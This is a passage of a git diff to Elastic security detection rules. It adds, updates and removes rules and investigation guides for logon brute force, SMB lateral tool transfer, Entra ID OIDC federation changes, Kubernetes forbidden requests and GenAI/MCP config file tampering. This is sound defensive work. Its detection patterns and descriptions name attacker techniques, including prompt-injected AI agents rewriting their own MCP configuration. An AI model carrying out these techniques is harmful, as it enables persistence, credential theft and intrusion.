internal.\n- Investigate other alerts associated with the involved users and source host during the past 48 hours.\n- Identify the source and the target computer and their roles in the IT environment.\n- Check whether the involved credentials are used in automation or scheduled tasks.\n- If this activity is suspicious, contact the account owner and confirm whether they are aware of it.\n- Examine the source host for derived artifacts that indicate compromise:\n - Observe and collect information about the following activities in the alert source host:\n - Attempts to contact external domains and addresses.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the host which is the source of this activity\n\n### False positive analysis\n\n- Understand the context of the authentications by contacting the asset owners. This activity can be related to a new or existing automation or business process that is in a failing state.\n- Authentication misconfiguration or obsolete credentials.\n- Service account password expired.\n- Domain trust relationship issues.\n- Infrastructure or availability issues.\n\n### Related rules\n\n- Multiple Logon Failure Followed by Logon Success - 4e85dc8a-3e41-40d8-bc28-91af7ac6cf60\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the source host to prevent further post-compromise behavior.\n- If the asset is exposed to the internet with RDP or other remote services available, take the necessary measures to restrict access to the asset. If not possible, limit the access via the firewall to only the needed IP addresses. Also, ensure the system uses robust authentication mechanisms and is patched regularly.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", - "query": "sequence by winlog.computer_name, source.ip with maxspan=10s\n [authentication where event.action == \"logon-failed\" and\n /* event 4625 need to be logged */\n winlog.logon.type : \"Network\" and\n source.ip != null and source.ip != \"127.0.0.1\" and source.ip != \"::1\" and\n not user.name : (\"ANONYMOUS LOGON\", \"-\", \"*$\") and not user.domain == \"NT AUTHORITY\" and\n\n /*\n noisy failure status codes often associated to authentication misconfiguration :\n 0xC000015B - The user has not been granted the requested logon type (also called the logon right) at this machine.\n 0XC000005E\t- There are currently no logon servers available to service the logon request.\n 0XC0000133\t- Clocks between DC and other computer too far out of sync.\n 0XC0000192\tAn attempt was made to logon, but the Netlogon service was not started.\n */\n not winlog.event_data.Status : (\"0xC000015B\", \"0XC000005E\", \"0XC0000133\", \"0XC0000192\")] with runs=10\n", + "query": "from logs-system.security*, logs-windows.forwarded*, winlogbeat-* metadata _id, _version, _index\n| where event.category == \"authentication\" and host.os.type == \"windows\" and event.action == \"logon-failed\" and\n winlog.logon.type == \"Network\" and source.ip is not null and winlog.computer_name is not null and\n not cidr_match(TO_IP(source.ip), \"127.0.0.0/8\", \"::1\") and\n not user.name in (\"ANONYMOUS LOGON\", \"-\") and not user.name like \"*$\" and user.domain != \"NT AUTHORITY\" and\n /*\n noisy failure status codes often associated to authentication misconfiguration\n 0xC000015B - The user has not been granted the requested logon type (also called the logon right) at this machine.\n 0XC000005E - There are currently no logon servers available to service the logon request.\n 0XC0000133 - Clocks between DC and other computer too far out of sync.\n 0XC0000192 An attempt was made to logon, but the Netlogon service was not started.\n 0xc00000dc - DC is in shutdown phase, it will normally tell current clients to use another DC for authentication.\n */\n not winlog.event_data.Status in (\"0xc000015b\", \"0xc000005e\", \"0xc0000133\", \"0xc0000192\", \"0xc00000dc\")\n// truncate the timestamp to a 60-second window\n| eval Esql.time_window = date_trunc(60 seconds, @timestamp)\n| stats Esql.failed_auth_count = COUNT(*),\n Esql.count_distinct_target_user_name = count_distinct(winlog.event_data.TargetUserName),\n Esql.target_user_name_values = VALUES(winlog.event_data.TargetUserName),\n Esql.user_domain_values = VALUES(user.domain),\n Esql.error_codes = VALUES(winlog.event_data.Status),\n Esql.data_stream_namespace.values = VALUES(data_stream.namespace) by winlog.computer_name, source.ip, Esql.time_window, winlog.logon.type\n| where Esql.failed_auth_count >= 100 and Esql.count_distinct_target_user_name >= 2\n| eval user.name = MV_FIRST(Esql.target_user_name_values)\n| KEEP winlog.computer_name, source.ip, user.name, Esql.time_window, winlog.logon.type, Esql.*\n", "references": [ "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625", "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=4624", @@ -33,39 +28,59 @@ ], "required_fields": [ { - "ecs": true, - "name": "event.action", - "type": "keyword" + "ecs": false, + "name": "Esql.count_distinct_target_user_name", + "type": "long" }, { - "ecs": true, - "name": "source.ip", - "type": "ip" + "ecs": false, + "name": "Esql.data_stream_namespace.values", + "type": "keyword" }, { - "ecs": true, - "name": "user.domain", + "ecs": false, + "name": "Esql.error_codes", "type": "keyword" }, { - "ecs": true, - "name": "user.name", + "ecs": false, + "name": "Esql.failed_auth_count", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.target_user_name_values", "type": "keyword" }, { "ecs": false, - "name": "winlog.computer_name", + "name": "Esql.time_window", + "type": "date" + }, + { + "ecs": false, + "name": "Esql.user_domain_values", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "user.name", "type": "keyword" }, { "ecs": false, - "name": "winlog.event_data.Status", + "name": "winlog.computer_name", "type": "keyword" }, { "ecs": false, "name": "winlog.logon.type", - "type": "unknown" + "type": "keyword" } ], "risk_score": 47, @@ -109,9 +124,10 @@ ] } ], - "type": "eql", - "version": 114 + "timestamp_override": "event.ingested", + "type": "esql", + "version": 118 }, - "id": "48b6edfc-079d-4907-b43c-baffa243270d_114", + "id": "48b6edfc-079d-4907-b43c-baffa243270d_118", "type": "security-rule" } \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/498e4094-60e7-11f0-8847-f661ea17fbcd_5.json b/packages/security_detection_engine/kibana/security_rule/498e4094-60e7-11f0-8847-f661ea17fbcd_5.json deleted file mode 100644 index d749a41a012..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/498e4094-60e7-11f0-8847-f661ea17fbcd_5.json +++ /dev/null @@ -1,143 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Detects a change to the OpenID Connect (OIDC) discovery URL in the Entra ID Authentication Methods Policy. This behavior may indicate an attempt to federate Entra ID with an attacker-controlled identity provider, enabling bypass of multi-factor authentication (MFA) and unauthorized access through bring-your-own IdP (BYOIDP) methods.", - "from": "now-9m", - "interval": "8m", - "language": "esql", - "license": "Elastic License v2", - "name": "OIDC Discovery URL Changed in Entra ID", - "note": "## Triage and analysis\n\n### Investigating OIDC Discovery URL Changed in Entra ID\n\nThis rule detects when the OIDC `discoveryUrl` is changed within the Entra ID Authentication Methods policy. Adversaries may leverage this to federate Entra ID with a rogue Identity Provider (IdP) under their control, allowing them to authenticate users with attacker-owned credentials and bypass MFA. This misconfiguration allows an attacker to impersonate valid users by issuing tokens via a third-party OIDC IdP while still passing validation in Entra ID. This technique has been publicly demonstrated and has critical implications for trust in federated identity.\n\n### Possible investigation steps\n- Review `azure.auditlogs.properties.initiated_by.user.userPrincipalName` and `ipAddress` to identify who made the change and from where.\n- Examine the `old_oidc_discovery` and `new_oidc_discovery` to confirm if the new `discoveryUrl` points to an unexpected or untrusted IdP.\n- Check that the discovery URLs have `.well-known/openid-configuration` endpoints, which are standard for OIDC providers.\n- Use `azure.auditlogs.properties.correlation_id` to pivot to related changes and activity from the same session.\n- Review any subsequent sign-in activity that may have originated from the new IdP.\n- Pivot to additional logs associated with the user or application that made the change to identify any further suspicious activity.\n\n### False positive analysis\n- Entra ID administrators may intentionally reconfigure OIDC trust relationships to support new business requirements.\n- Validate any changes with the identity or security operations team before taking action.\n\n### Response and remediation\n- If the change is unauthorized, immediately revert the discovery URL to the trusted IdP via the Entra ID portal.\n- Revoke tokens or sessions issued after the configuration change.\n- Investigate how the unauthorized change occurred (e.g., compromised account or over-privileged app).\n- Apply conditional access policies and change control procedures to protect IdP configuration changes.\n", - "query": "from logs-azure.auditlogs-* metadata _id, _version, _index\n| where event.action == \"Authentication Methods Policy Update\"\n| eval Esql.azure_auditlogs_properties_target_resources_modified_properties_new_value_replace = replace(`azure.auditlogs.properties.target_resources.0.modified_properties.0.new_value`, \"\\\\\\\\\", \"\")\n| eval Esql.azure_auditlogs_properties_target_resources_modified_properties_old_value_replace = replace(`azure.auditlogs.properties.target_resources.0.modified_properties.0.old_value`, \"\\\\\\\\\", \"\")\n| dissect Esql.azure_auditlogs_properties_target_resources_modified_properties_new_value_replace \"%{}discoveryUrl\\\":\\\"%{Esql.azure_auditlogs_properties_auth_oidc_discovery_url_new}\\\"}%{}\"\n| dissect Esql.azure_auditlogs_properties_target_resources_modified_properties_old_value_replace \"%{}discoveryUrl\\\":\\\"%{Esql.azure_auditlogs_properties_auth_oidc_discovery_url_old}\\\"}%{}\"\n| where Esql.azure_auditlogs_properties_auth_oidc_discovery_url_new is not null and Esql.azure_auditlogs_properties_auth_oidc_discovery_url_old is not null\n| where Esql.azure_auditlogs_properties_auth_oidc_discovery_url_new != Esql.azure_auditlogs_properties_auth_oidc_discovery_url_old\n| keep\n @timestamp,\n event.action,\n event.outcome,\n azure.tenant_id,\n azure.correlation_id,\n azure.auditlogs.properties.activity_datetime,\n azure.auditlogs.properties.operation_type,\n azure.auditlogs.properties.initiated_by.user.userPrincipalName,\n azure.auditlogs.properties.initiated_by.user.displayName,\n azure.auditlogs.properties.initiated_by.user.ipAddress,\n source.geo.city_name,\n source.geo.region_name,\n source.geo.country_name,\n Esql.azure_auditlogs_properties_auth_oidc_discovery_url_new,\n Esql.azure_auditlogs_properties_auth_oidc_discovery_url_old\n", - "references": [ - "https://dirkjanm.io/persisting-with-federated-credentials-entra-apps-managed-identities/" - ], - "related_integrations": [ - { - "package": "azure", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "@timestamp", - "type": "date" - }, - { - "ecs": false, - "name": "Esql.azure_auditlogs_properties_auth_oidc_discovery_url_new", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql.azure_auditlogs_properties_auth_oidc_discovery_url_old", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.activity_datetime", - "type": "date" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.initiated_by.user.displayName", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.initiated_by.user.ipAddress", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.initiated_by.user.userPrincipalName", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.operation_type", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.correlation_id", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.tenant_id", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.geo.city_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.geo.country_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.geo.region_name", - "type": "keyword" - } - ], - "risk_score": 73, - "rule_id": "498e4094-60e7-11f0-8847-f661ea17fbcd", - "severity": "high", - "tags": [ - "Domain: Cloud", - "Domain: Identity", - "Data Source: Azure", - "Data Source: Microsoft Entra ID", - "Data Source: Microsoft Entra ID Audit Logs", - "Use Case: Identity and Access Audit", - "Tactic: Persistence", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0003", - "name": "Persistence", - "reference": "https://attack.mitre.org/tactics/TA0003/" - }, - "technique": [ - { - "id": "T1556", - "name": "Modify Authentication Process", - "reference": "https://attack.mitre.org/techniques/T1556/", - "subtechnique": [ - { - "id": "T1556.009", - "name": "Conditional Access Policies", - "reference": "https://attack.mitre.org/techniques/T1556/009/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "esql", - "version": 5 - }, - "id": "498e4094-60e7-11f0-8847-f661ea17fbcd_5", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/4b77d382-b78e-4aae-85a0-8841b80e4fc4_1.json b/packages/security_detection_engine/kibana/security_rule/4b77d382-b78e-4aae-85a0-8841b80e4fc4_1.json deleted file mode 100644 index 6d4a9a112d8..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/4b77d382-b78e-4aae-85a0-8841b80e4fc4_1.json +++ /dev/null @@ -1,73 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "This rule detects when a forbidden request is made from an unusual user agent in a Kubernetes environment. Adversary tooling may use non-standard or unexpected user agents to interact with the Kubernetes API, which can indicate an attempt to evade detection or blend in with legitimate traffic. In combination with a forbidden request, this behavior can suggest an adversary is attempting to exploit vulnerabilities or misconfigurations in the Kubernetes cluster.", - "index": [ - "logs-kubernetes.audit_logs-*" - ], - "language": "eql", - "license": "Elastic License v2", - "name": "Forbidden Request from Unusual User Agent in Kubernetes", - "note": " ## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Forbidden Request from Unusual User Agent in Kubernetes\n\nKubernetes, a container orchestration platform, manages applications across clusters. It uses APIs for communication, which can be targeted by adversaries using atypical user agents to mask malicious activities. These agents may attempt unauthorized actions, exploiting vulnerabilities. The detection rule identifies such anomalies by flagging forbidden requests from non-standard user agents, indicating potential threats.\n\n### Possible investigation steps\n\n- Review the Kubernetes audit logs to identify the source IP address and user associated with the forbidden request. This can help determine if the request originated from a known or unknown entity.\n- Analyze the user agent string in the audit logs to understand its origin and purpose. Cross-reference it with known legitimate user agents to assess its legitimacy.\n- Check for any recent changes or deployments in the Kubernetes environment that might have introduced new user agents or configurations, potentially leading to the forbidden request.\n- Investigate the specific resource or API endpoint that was targeted by the forbidden request to understand what the adversary might have been attempting to access or exploit.\n- Correlate the event with other security logs and alerts to identify any patterns or additional suspicious activities that might indicate a broader attack or reconnaissance effort.\n- Assess the current security posture and configurations of the Kubernetes cluster to identify any vulnerabilities or misconfigurations that could be exploited by adversaries using unusual user agents.\n\n### False positive analysis\n\n- Legitimate internal tools or scripts may use non-standard user agents that are not included in the exclusion list. Review and identify these tools, then update the exclusion list to prevent them from being flagged.\n- Automated processes or third-party integrations might use unique user agents that trigger the rule. Verify these processes and consider adding their user agents to the exclusion list if they are deemed safe.\n- Development or testing environments often use custom user agents for API interactions. Ensure these environments are accounted for by excluding their user agents to avoid unnecessary alerts.\n- Regularly review and update the exclusion list to reflect changes in legitimate user agents used within your organization, ensuring that only truly unusual and potentially malicious agents are flagged.\n\n### Response and remediation\n\n- Immediately isolate the affected Kubernetes node or cluster to prevent further unauthorized access or potential lateral movement by the adversary.\n- Revoke any suspicious or unauthorized credentials or tokens that may have been used in the forbidden request to ensure they cannot be reused.\n- Conduct a thorough review of the Kubernetes audit logs to identify any additional unauthorized or suspicious activities that may have occurred around the time of the alert.\n- Patch any identified vulnerabilities or misconfigurations in the Kubernetes environment that may have been exploited, ensuring all components are up to date with the latest security patches.\n- Implement stricter access controls and user agent validation to prevent non-standard user agents from interacting with the Kubernetes API unless explicitly allowed.\n- Escalate the incident to the security operations team for further investigation and to determine if additional containment or remediation actions are necessary.\n- Enhance monitoring and alerting for similar activities by tuning detection systems to recognize patterns associated with this type of threat, ensuring rapid response to future incidents.\n", - "query": "any where host.os.type == \"linux\" and event.dataset == \"kubernetes.audit_logs\" and\nkubernetes.audit.stage == \"ResponseComplete\" and `kubernetes.audit.annotations.authorization_k8s_io/decision` == \"forbid\" and\nnot user_agent.original like~ (\n \"/\", \"karpenter\", \"csi-secrets-store/*\", \"elastic-agent/*\", \"agentbeat/*\", \"insights-operator*\", \"oc/*\", \"cloud-defend/*\",\n \"OpenAPI-Generator/*\", \"local-storage-operator/*\", \"falcon-client/*\", \"nginx-ingress-controller/*\", \"config-translator/*\",\n \"kwatch/*\", \"PrometheusOperator/*\", \"kube*\"\n)\n", - "related_integrations": [ - { - "package": "kubernetes", - "version": "^1.4.1" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "`kubernetes.audit.annotations.authorization_k8s_io/decision`", - "type": "unknown" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "host.os.type", - "type": "keyword" - }, - { - "ecs": false, - "name": "kubernetes.audit.stage", - "type": "keyword" - }, - { - "ecs": true, - "name": "user_agent.original", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "4b77d382-b78e-4aae-85a0-8841b80e4fc4", - "severity": "medium", - "tags": [ - "Data Source: Kubernetes", - "Tactic: Execution", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0002", - "name": "Execution", - "reference": "https://attack.mitre.org/tactics/TA0002/" - }, - "technique": [] - } - ], - "timestamp_override": "event.ingested", - "type": "eql", - "version": 1 - }, - "id": "4b77d382-b78e-4aae-85a0-8841b80e4fc4_1", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/58bc134c-e8d2-4291-a552-b4b3e537c60b_112.json b/packages/security_detection_engine/kibana/security_rule/58bc134c-e8d2-4291-a552-b4b3e537c60b_112.json new file mode 100644 index 00000000000..6838d1993bd --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/58bc134c-e8d2-4291-a552-b4b3e537c60b_112.json @@ -0,0 +1,134 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation or change of a Windows executable file over network shares. Adversaries may transfer tools or other files between systems in a compromised environment.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.file-*", + "logs-endpoint.events.network-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Lateral Tool Transfer via SMB Share", + "note": "## Triage and analysis\n\n### Investigating Potential Lateral Tool Transfer via SMB Share\n\nAdversaries can use network shares to host tooling to support the compromise of other hosts in the environment. These tools can include discovery utilities, credential dumpers, malware, etc. Attackers can also leverage file shares that employees frequently access to host malicious files to gain a foothold in other machines.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Retrieve the created file and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity can happen legitimately. Consider adding exceptions if it is expected and noisy in your environment.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Review the privileges needed to write to the network share and restrict write access as needed.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence by host.id with maxspan=30s\n [network where host.os.type == \"windows\" and event.type == \"start\" and process.pid == 4 and destination.port == 445 and\n network.direction : (\"incoming\", \"ingress\") and\n network.transport == \"tcp\" and source.ip != \"127.0.0.1\" and source.ip != \"::1\"\n ] by process.entity_id\n /* add more executable / script extensions here if they are not noisy in your environment */\n [file where host.os.type == \"windows\" and event.type in (\"creation\", \"change\") and process.pid == 4 and user.id like (\"S-1-5-21*\", \"S-1-12-*\") and \n (file.Ext.header_bytes : \"4d5a*\" or file.extension : (\"exe\", \"scr\", \"pif\", \"com\", \"dll\", \"bat\", \"cmd\", \"ps1\", \"vbs\", \"vbe\", \"js\", \"jse\", \"wsh\", \"wsf\", \"sct\", \"hta\", \"cpl\"))] by process.entity_id\n", + "references": [ + "https://www.elastic.co/security-labs/elastic-protects-against-data-wiper-malware-targeting-ukraine-hermeticwiper", + "https://www.elastic.co/security-labs/hunting-for-lateral-movement-using-event-query-language" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.port", + "type": "long" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "file.Ext.header_bytes", + "type": "unknown" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.direction", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.transport", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pid", + "type": "long" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "58bc134c-e8d2-4291-a552-b4b3e537c60b", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/", + "subtechnique": [ + { + "id": "T1021.002", + "name": "SMB/Windows Admin Shares", + "reference": "https://attack.mitre.org/techniques/T1021/002/" + } + ] + }, + { + "id": "T1570", + "name": "Lateral Tool Transfer", + "reference": "https://attack.mitre.org/techniques/T1570/" + } + ] + } + ], + "type": "eql", + "version": 112 + }, + "id": "58bc134c-e8d2-4291-a552-b4b3e537c60b_112", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/590fc62d-7386-4c75-92b0-af4517018da1_4.json b/packages/security_detection_engine/kibana/security_rule/590fc62d-7386-4c75-92b0-af4517018da1_4.json new file mode 100644 index 00000000000..e3baf776b5e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/590fc62d-7386-4c75-92b0-af4517018da1_4.json @@ -0,0 +1,111 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects unusual modification of GenAI tool configuration files. Adversaries may inject malicious MCP server configurations to hijack AI agents for persistence, C2, or data exfiltration. Attack vectors include malware or scripts directly poisoning config files, supply chain attacks via compromised dependencies, and prompt injection attacks that abuse the GenAI tool itself to modify its own configuration. Unauthorized MCP servers added to these configs execute arbitrary commands when the AI tool is next invoked.", + "from": "now-9m", + "history_window_start": "now-7d", + "index": [ + "logs-endpoint.events.file*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Unusual Process Modifying GenAI Configuration File", + "new_terms_fields": [ + "process.executable" + ], + "note": "## Triage and analysis\n\n### Investigating Unusual Process Modifying GenAI Configuration File\n\nConfiguration files for GenAI tools like Cursor, Claude, Copilot, and Ollama control which MCP servers, plugins, and extensions are loaded. Attackers target these files to inject malicious MCP servers that execute arbitrary commands, exfiltrate data, or establish persistence. Threats include external processes (malware, compromised scripts, supply chain attacks) directly modifying configs, as well as prompt injection attacks that abuse the AI tool's own file access capabilities.\n\n### Possible investigation steps\n\n- Identify the process that modified the configuration file and determine if it's expected (GenAI tool, installer, user action) or suspicious (unknown script, malware).\n- If the modifying process is NOT a GenAI tool, investigate its origin, parent process tree, and whether it was downloaded or executed from a suspicious location.\n- If a GenAI tool made the modification, check recent user prompts or agent activity that may have triggered the config change via prompt injection.\n- Review the contents of the modified configuration file for suspicious MCP server URLs, unauthorized plugins, or unusual agent permissions.\n- Examine the process command line and parent process tree to identify how the modifying process was invoked.\n- Check for other file modifications by the same process around the same time, particularly to other GenAI configs or startup scripts.\n- Investigate whether the GenAI tool subsequently connected to unknown domains or spawned unusual child processes after the config change.\n\n### False positive analysis\n\n- Novel but legitimate configuration changes will trigger this rule when the process hasn't been seen modifying these files within the configured history window. Review the modified file content to determine legitimacy.\n- GenAI tool updates may modify config files in new ways; correlate with recent software updates.\n- IDE extensions integrating with GenAI tools may modify configs as part of initial setup.\n- Developer tools (git, go, npm) checking out or downloading projects containing `.gemini/` or `.claude/` directories may trigger alerts. These are project-level configs, not user configs - verify by checking if the path is within a project directory.\n\n### Response and remediation\n\n- Review the modified configuration file and revert any unauthorized changes to MCP servers, plugins, or agent settings.\n- If malicious MCP servers were added, block the associated domains at the network level.\n- Review and rotate any API keys or credentials that may have been exposed through the compromised GenAI configuration.\n", + "query": "event.category : \"file\" and event.action : (\"modification\" or \"overwrite\") and\nfile.path : (\n */.cursor/mcp.json or */.cursor/settings.json or */AppData/Roaming/Cursor/*mcp* or\n */.claude/* or */claude_desktop_config.json or */AppData/Roaming/Claude/* or\n */.config/github-copilot/* or */AppData/Local/GitHub?Copilot/* or\n */.ollama/config* or */AppData/Local/Ollama/* or\n */.codex/* or */AppData/Roaming/Codex/* or\n */.gemini/* or */AppData/Roaming/gemini-cli/* or\n */.grok/* or */AppData/Roaming/Grok/* or\n */.windsurf/* or */AppData/Roaming/Windsurf/* or\n */.vscode/extensions/*mcp* or\n */.openclaw/* or */AppData/Roaming/OpenClaw/* or\n */.moltbot/* or */AppData/Roaming/Moltbot/* or\n */.config/openclaw/*\n) and not (\n file.extension : (lck or lock or log or png or marker) or\n file.name : .DS_Store or\n file.path : (\n */.claude/cache/* or\n */.claude/statsig/* or\n */.codex/log/* or\n */.codex/sessions/*\n ) or\n (\n file.path : */.config/github-copilot/* and \n file.name : (apps.json or versions.json or copilot*nitrite.db)\n )\n)\n", + "references": [ + "https://modelcontextprotocol.io/", + "https://www.cybereason.com/blog/security-research/weaponized-ai-how-cybercriminals-exploit-mcp-for-account-takeover", + "https://glama.ai/blog/2025-11-11-the-lethal-trifecta-securing-model-context-protocol-against-data-flow-attacks", + "https://www.elastic.co/security-labs/elastic-advances-llm-security" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "590fc62d-7386-4c75-92b0-af4517018da1", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Persistence", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", + "Domain: LLM" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1556", + "name": "Modify Authentication Process", + "reference": "https://attack.mitre.org/techniques/T1556/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1554", + "name": "Compromise Host Software Binary", + "reference": "https://attack.mitre.org/techniques/T1554/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 4 + }, + "id": "590fc62d-7386-4c75-92b0-af4517018da1_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5919988c-29e1-4908-83aa-1f087a838f63_6.json b/packages/security_detection_engine/kibana/security_rule/5919988c-29e1-4908-83aa-1f087a838f63_6.json new file mode 100644 index 00000000000..79f0e89ee21 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/5919988c-29e1-4908-83aa-1f087a838f63_6.json @@ -0,0 +1,96 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + 